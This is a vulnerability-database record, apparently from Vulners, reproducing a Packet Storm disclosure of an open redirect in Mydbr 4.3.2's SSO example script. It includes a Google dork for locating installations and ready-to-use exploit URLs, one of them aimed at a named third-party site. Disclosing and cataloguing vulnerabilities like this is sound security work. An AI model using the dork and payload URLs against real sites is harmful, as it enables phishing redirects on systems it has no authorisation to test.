DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:142059", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mydbr 4.3.2 Open Redirect", "description": "", "published": "2017-04-07T00:00:00", "modified": "2017-04-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/142059/Mydbr-4.3.2-Open-Redirect.html", "reporter": "Hasnain Raza", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2017-04-10T19:24:19", "viewCount": 24, "enchantments": {"score": {"value": -0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.7}, "_state": {"dependencies": 1678912935, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "b2af0e0aca2da4fa3679e6cd2e1c2390"}, "sourceHref": "https://packetstormsecurity.com/files/download/142059/mydbr-redirect.txt", "sourceData": "`# Exploit Title: Mydbr Redirect \n# Google Dork: inurl:mydbr/report.php \n# Date: 2015-09-15 \n# Exploit Author: Hasnain Raza <https://www.fb.com/haxorhasnain/> \n# Vendor Homepage: http://mydbr.com/ \n# Software Link: http://mydbr.com/fileserve.php?get=mydbr_app.zip \n# Version: 4.3.2 \n# Tested on: Linux,ubuntu,windows \n \nA vulnerability has been detected in mydbr file oldest to 4.3.2 \n \nThe following URL is vulnerable \n \n/user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser% \n40mycompany.com \n&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query \n \nexample: \nhttp://mydbr.com/demo/mydbr/user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser%40mycompany.com&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query \n \nwww.eac-bs.com/mydbr//user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser%40mycompany.com&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query \n`\n"}

{}